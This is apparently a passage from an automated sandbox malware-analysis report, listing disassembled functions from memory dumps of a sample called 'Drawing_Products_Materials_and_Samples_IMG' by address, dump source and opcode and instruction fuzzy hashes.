                                                                                      • Opcode Fuzzy Hash: d116417c40c002b3cdc81d6dd879ef1c670efbdd4b02a6ba2cd629467fead9f5
                                                                                      • Instruction Fuzzy Hash: D941D5B4D0164C8BEB18DFAAD9546DEFBF2AF89300F20D12AC818BB255DB345946CF54
                                                                                      Function 37364A71 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b0cdeb53a1b12ab3426d754e229cd4583bd1e8d3e00f095b490409a1bc10ed06
                                                                                      • Instruction ID: a20d90e4835469f478133b5294e0a3f1c6da92815167701c49b17e402523c372
                                                                                      • Opcode Fuzzy Hash: b0cdeb53a1b12ab3426d754e229cd4583bd1e8d3e00f095b490409a1bc10ed06
                                                                                      • Instruction Fuzzy Hash: A541D674D016088BEB14DFAAC9447DEBBF2BF89304F20D12AD418BB259DB345946CF54
                                                                                      Function 36A9E2B5 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f8d4d1ce1743722ac611730e6f00f5516e701c7fe9bf1b7427958e605b4765e
                                                                                      • Instruction ID: cd749db66fd2856e56ef156107ef2dfad7fb9a54c6591bc4e034f48c600912db
                                                                                      • Opcode Fuzzy Hash: 1f8d4d1ce1743722ac611730e6f00f5516e701c7fe9bf1b7427958e605b4765e
                                                                                      • Instruction Fuzzy Hash: 6D41B574D016188BEB14DFAAD9546DEBBF2BF89300F20D12AC818BB265DB345945CF54
                                                                                      Function 36A9E709 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5aca16e345daf2a1b25142716604cddb1e95c5eef7b9974b8158545fc83175f
                                                                                      • Instruction ID: 529b8367075286b3764e1365024cf8032e2168c05a3067812b7704c7c8721fc1
                                                                                      • Opcode Fuzzy Hash: e5aca16e345daf2a1b25142716604cddb1e95c5eef7b9974b8158545fc83175f
                                                                                      • Instruction Fuzzy Hash: DA41D674E0124C8BEB18DFAAD9546DEBBF2BF89300F20D129C418BB255DB345946CF55
                                                                                      Function 36A9EB60 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0009af34db537ee2c60aaec6d178ac478cec943656b601c27f7870e0c9621f0f
                                                                                      • Instruction ID: 3f11c049cebccc3575708c6c09ffd2f0df04413d0cc0ed1ae067e4821f07b1b2
                                                                                      • Opcode Fuzzy Hash: 0009af34db537ee2c60aaec6d178ac478cec943656b601c27f7870e0c9621f0f
                                                                                      • Instruction Fuzzy Hash: CD41F374E0524C8BEB18DFAAD9446DEBBF2BF89304F20C12AC818BB255DB354946CF50
                                                                                      Function 37367720 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f2bd8912903144f551949aeea60d54ba69ea3155eb6a783e5ae0742082ff784
                                                                                      • Instruction ID: 544b99ee7c567169981acff83fd950b0bf101f8031e0e67a0c473884df693c4b
                                                                                      • Opcode Fuzzy Hash: 1f2bd8912903144f551949aeea60d54ba69ea3155eb6a783e5ae0742082ff784
                                                                                      • Instruction Fuzzy Hash: B841D5B4D012088BEB18CFAAD9547DEBBF2AF89304F60D12AC418BB259DB345946CF54
                                                                                      Function 37365BD1 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a1bb2e39a7ec6dd3f0c340f782f9b97434b1ede1ee63489a29ebe8048b69a35
                                                                                      • Instruction ID: c25b7b11b9c3f0a28e773b885c09ea1284c19b91f0ab9f804fcb8a6bd3520c21
                                                                                      • Opcode Fuzzy Hash: 4a1bb2e39a7ec6dd3f0c340f782f9b97434b1ede1ee63489a29ebe8048b69a35
                                                                                      • Instruction Fuzzy Hash: 1541C5B0D05208CBEB18DFAAD9447DEBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Function 37364618 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91f2b688183c6eaeeb8ca38947e267ed022764dfe9108785f229f03cdc25fbdd
                                                                                      • Instruction ID: 9a248cada4264aa23ab2a2c61e3a1cf0a7484335795f17fa7c4805a4b8a07ca9
                                                                                      • Opcode Fuzzy Hash: 91f2b688183c6eaeeb8ca38947e267ed022764dfe9108785f229f03cdc25fbdd
                                                                                      • Instruction Fuzzy Hash: 3C4106B0D01248CBEB18DFAAD9546DEFBF2AF89304F20D12AC418BB258DB345945CF54
                                                                                      Function 37361A40 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bce52cb82766780388dcd2cc97152fb7d2a8fe9c4a9ed0fab88ecde9f13e927
                                                                                      • Instruction ID: 55c59ac779988cf7307c86d438da1d4b7860b9b8ff090a51e4ad46460c174c24
                                                                                      • Opcode Fuzzy Hash: 0bce52cb82766780388dcd2cc97152fb7d2a8fe9c4a9ed0fab88ecde9f13e927
                                                                                      • Instruction Fuzzy Hash: CF41F6B4D01608CBEB14CFAAC9946DEBBF2AF89304F20D129C418BB259DB345946CF54
                                                                                      Function 37360033 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd93ab3e81126dd5361e8297cffd8f6824ef5e553ac7fa05a234dfcc09ad05a4
                                                                                      • Instruction ID: 3e5f44a79e64d25e758ce2453ea4efad6733e023b140fdff91410d3c270291c1
                                                                                      • Opcode Fuzzy Hash: dd93ab3e81126dd5361e8297cffd8f6824ef5e553ac7fa05a234dfcc09ad05a4
                                                                                      • Instruction Fuzzy Hash: B541D6B4D01608CBEB18DFAAC9546DDBBF2AF89304F20D12AC418BB259DB355946CF51
                                                                                      Function 36A9F413 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca8493a8651d5ae18699a33ff2812b887487f2313131ee538738c407f027eb9f
                                                                                      • Instruction ID: ae632f2df618f4450b401b9ddd9de03ec023159ad79fc06f5674784c71c32f72
                                                                                      • Opcode Fuzzy Hash: ca8493a8651d5ae18699a33ff2812b887487f2313131ee538738c407f027eb9f
                                                                                      • Instruction Fuzzy Hash: 3541D374E01608CBEB18DFAAD9446DEBBF2AF89300F20D12AC818BB255DB345946CF54
                                                                                      Function 36A9D153 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6b0a837c92660e9d0c1de685b9101553dc43b39042af03e9a3d3b9c4058590a
                                                                                      • Instruction ID: cb20c469ae87b0101aef1b57d26d262e2324535b32a5ce2578a69d2ee2b1ae38
                                                                                      • Opcode Fuzzy Hash: a6b0a837c92660e9d0c1de685b9101553dc43b39042af03e9a3d3b9c4058590a
                                                                                      • Instruction Fuzzy Hash: 1741D5B4E056088BEB14DFAAD9446DDBBF2AF89304F20D12AC818BB255DB345946CF54
                                                                                      Function 37366E71 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df05600a1f9d03ff2f204822eb26d3c7a99ab6a8314bc757c78e8e5f6f100888
                                                                                      • Instruction ID: 0d5419dd8529fb8dbeba40a704f1b6b2c14a97b4aee256ddf7137f56cead5769
                                                                                      • Opcode Fuzzy Hash: df05600a1f9d03ff2f204822eb26d3c7a99ab6a8314bc757c78e8e5f6f100888
                                                                                      • Instruction Fuzzy Hash: E941E5B4D01248CBEB18CFAAC9547DDBBF2AF89304F20D12AD418AB259DB355946CF54
                                                                                      Function 37361190 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd38f4358d80994f2f94770aeb1af97d301595bf4135d5a48664fc17f4d4b899
                                                                                      • Instruction ID: 5eca061af43621ae83faa7ca89ffe085797b2e4bc9f7cd773510db131995e4e5
                                                                                      • Opcode Fuzzy Hash: dd38f4358d80994f2f94770aeb1af97d301595bf4135d5a48664fc17f4d4b899
                                                                                      • Instruction Fuzzy Hash: CF41E7B4D01608CBEB14DFAAD9946DEFBF2AF89304F20D12AC418BB258DB345946CF54
                                                                                      Function 37416751 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a79c705d25166d2a05f1fdfcb36525a701223994d75f81a188568a66da72b433
                                                                                      • Instruction ID: 316c20f16b8752ea4834bbcf4003eb9ca6c8ef7c6fb812b528403da3ba0ef221
                                                                                      • Opcode Fuzzy Hash: a79c705d25166d2a05f1fdfcb36525a701223994d75f81a188568a66da72b433
                                                                                      • Instruction Fuzzy Hash: 6731D674E01218CBEB14DFAAD9546DEBBF2BF89300F24D02AC818BB255DB349942CF55
                                                                                      Function 37410350 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48b0fadc4e44dc4f643dc71c05672b2c83ca082a601487324cbecf9bb0d66d30
                                                                                      • Instruction ID: 41bcc24b13d3052f661d9e2763e8bb2d04b2e911e3e199829d4072ded90589cb
                                                                                      • Opcode Fuzzy Hash: 48b0fadc4e44dc4f643dc71c05672b2c83ca082a601487324cbecf9bb0d66d30
                                                                                      • Instruction Fuzzy Hash: 3531D374E0124CCBEB18DFAAD9506DEBBF2BF89300F24D12AD818AB255DB345942CF55
                                                                                      Function 36A9DA01 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38d8b52e4a4f98e28bad28db63d8b07c785e9f41d8b1cdcc6b8277be65b06fec
                                                                                      • Instruction ID: e082803a6e6b5dbeb4054768044bc181d014a07f1eabcb49b3dd31c9537c53ee
                                                                                      • Opcode Fuzzy Hash: 38d8b52e4a4f98e28bad28db63d8b07c785e9f41d8b1cdcc6b8277be65b06fec
                                                                                      • Instruction Fuzzy Hash: 5541D375E0560C8BEB18DFAAC9546DEFBF2AF89300F20D12AC818BB255DB354946CF50
                                                                                      Function 36A9EFB9 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c82a407b6fe576da17a2f7fde442cacbed94831e41eba036d3fb1b14308bc11b
                                                                                      • Instruction ID: 54f7a03ff8d939a9fc7afb1dcbfd89bda0f28fe1b5e351062d6357edf72c2df7
                                                                                      • Opcode Fuzzy Hash: c82a407b6fe576da17a2f7fde442cacbed94831e41eba036d3fb1b14308bc11b
                                                                                      • Instruction Fuzzy Hash: 3441D670D0164C8BEB18DFAAD9546DEFBF2AF89300F20D12AC818BB255DB354945CF51
                                                                                      Function 36A9D5AB Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf84955562bfb51511b99e158fc1dfa263444cf9e672db35a83bc03240e024c8
                                                                                      • Instruction ID: 5e71843bb77444d44474af99c879f97beea966c494b168a65599386e4e7739e1
                                                                                      • Opcode Fuzzy Hash: cf84955562bfb51511b99e158fc1dfa263444cf9e672db35a83bc03240e024c8
                                                                                      • Instruction Fuzzy Hash: A041F374D00648CBEB18EFAAD9546DEBBF2AF89300F20C12AC818BB255DB344946CF50
                                                                                      Function 37365327 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0959d0464fdfdd490362085cc1587055fc0029eeb39204f858daec3b85be5c21
                                                                                      • Instruction ID: b63886a8756a1f5e545cfc11f410766b694285ac69263476e5508317b6ad5fa4
                                                                                      • Opcode Fuzzy Hash: 0959d0464fdfdd490362085cc1587055fc0029eeb39204f858daec3b85be5c21
                                                                                      • Instruction Fuzzy Hash: 6F41D3B4D01608CBEB18DFAAD9446DEBBF2AF89304F20D12AC418BB259DB355946CF54
                                                                                      Function 37365778 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68976330e8077dd252523efefea66858605829414ba0b8f956546794339576bb
                                                                                      • Instruction ID: 5ad4c1cb5a2bda497c109b223d4de154b3e83af45ef4830314f456c5745f2ab6
                                                                                      • Opcode Fuzzy Hash: 68976330e8077dd252523efefea66858605829414ba0b8f956546794339576bb
                                                                                      • Instruction Fuzzy Hash: CC41F674E01648CFEB18DFAAC9446DDBBF2AF89304F20D12AC418BB258DB345946CF50
                                                                                      Function 37362748 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8562ee8e4220c7ac18598b80b93ed6f504ae2969c6ee2841f3d2d33e47e61ae8
                                                                                      • Instruction ID: af92d51f246c518718546900f9feef5fb3132f9e2791284bff757b39004c8310
                                                                                      • Opcode Fuzzy Hash: 8562ee8e4220c7ac18598b80b93ed6f504ae2969c6ee2841f3d2d33e47e61ae8
                                                                                      • Instruction Fuzzy Hash: 2E41E5B4D05648CBEB14DFAAC9546DEFBF2AF89304F20D12AC418BB259DB385946CF50
                                                                                      Function 37366A1A Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d3a84b3e28720a8ab77f46e207bdb75cc6d9d1c5f71627f013ccb6c8eb3827e
                                                                                      • Instruction ID: 6658587cadd8c4581846da50569bb08fb191b36297180c04ecef1b9a6b51793d
                                                                                      • Opcode Fuzzy Hash: 6d3a84b3e28720a8ab77f46e207bdb75cc6d9d1c5f71627f013ccb6c8eb3827e
                                                                                      • Instruction Fuzzy Hash: 1F4108B4D01248CBEB14CFAAD9547DEBBF2AF89304F20D12AC418BB259DB355906CF54
                                                                                      Function 37361E98 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b90ae3a0f6d4168594ba207e3c72bb8151123b66a20a87b1a6b339f20b082813
                                                                                      • Instruction ID: 89ee877c921decb9fc5cd7805e8bb97e9b2a4402f8ccb34ffd558752762b6158
                                                                                      • Opcode Fuzzy Hash: b90ae3a0f6d4168594ba207e3c72bb8151123b66a20a87b1a6b339f20b082813
                                                                                      • Instruction Fuzzy Hash: 9841F6B4E052488BEB14DFAAC9446DEFBF2AF89304F20D12AC418BB258DB345946CF54
                                                                                      Function 37360D3F Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c308ee161c1ca64d0b5882d84cc3529372b8c06d448eacf19293d0691af48d37
                                                                                      • Instruction ID: f64d3eda3b313c6ccc71a4e39637a2243461c062e459bbf99d96aad679d612ae
                                                                                      • Opcode Fuzzy Hash: c308ee161c1ca64d0b5882d84cc3529372b8c06d448eacf19293d0691af48d37
                                                                                      • Instruction Fuzzy Hash: 1341E5B4D0164CCBEB18DFAAD9446DEBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Function 373615E8 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf16650acf4c84ff6fc16d54731f1ebc10ef2e4fa71d04ecf2b069a252640c45
                                                                                      • Instruction ID: ef4ea84c0653ae694e8f3d59e54d2555757907420f5330055985adf952721a39
                                                                                      • Opcode Fuzzy Hash: cf16650acf4c84ff6fc16d54731f1ebc10ef2e4fa71d04ecf2b069a252640c45
                                                                                      • Instruction Fuzzy Hash: 7A41E5B4D016488BEB14CFAAC9446DDFBF2AF89304F24D129C418BB258DB345945CF54
                                                                                      Function 37366028 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6300f21af6d106548d6de25f3417233a15cfe077f42fdc33d26d406a9309ae9d
                                                                                      • Instruction ID: cf94cf84e532b5318fdcef0fcdec6fa438ec13ed4d94862d40244b95dd4c3f01
                                                                                      • Opcode Fuzzy Hash: 6300f21af6d106548d6de25f3417233a15cfe077f42fdc33d26d406a9309ae9d
                                                                                      • Instruction Fuzzy Hash: B741E5B4E01248CBEB18DFAAD5547DDBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Function 37360488 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac53b29fb2c2b81b8f2c4f55a2b6da467c1982db3922dabef5e98593360ec13a
                                                                                      • Instruction ID: 5cc6838243fa14a85dd7e5ef767350e5895885dc0f7187ca2c7b6f771a3d27a6
                                                                                      • Opcode Fuzzy Hash: ac53b29fb2c2b81b8f2c4f55a2b6da467c1982db3922dabef5e98593360ec13a
                                                                                      • Instruction Fuzzy Hash: 2641E3B4D0520CCBEB18DFAAC9546DEFBF2AF89304F20D12AC418AB258DB345946CF54
                                                                                      Function 373608E0 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e52d882ff1d94bea152a9349325864d60c77e26be23a2d073b0bb1a55f94f319
                                                                                      • Instruction ID: 29592e6dffd46c4e2135db381166295a38e81b7575fa97b0dfc9ae6cbeb58312
                                                                                      • Opcode Fuzzy Hash: e52d882ff1d94bea152a9349325864d60c77e26be23a2d073b0bb1a55f94f319
                                                                                      • Instruction Fuzzy Hash: CA410574E0124CCBEB18CFAAC9546DDBBF2AF89304F20D12AC418BB259DB345946CF54
                                                                                      Function 3736647F Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a117231a9ff7992115d19a9ad5ea935a92455fefc141cb4c95defe97be3d50a0
                                                                                      • Instruction ID: 88da958e9569a393e664fd352e5d1d950fa8ef891a8cc37c6a76bf6c0cdebc65
                                                                                      • Opcode Fuzzy Hash: a117231a9ff7992115d19a9ad5ea935a92455fefc141cb4c95defe97be3d50a0
                                                                                      • Instruction Fuzzy Hash: 4541E5B4D01248CBEB18DFAAD9586DDBBF2AF89304F20D12AC418BB259DB345946CF04
                                                                                      Function 3736B0C0 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
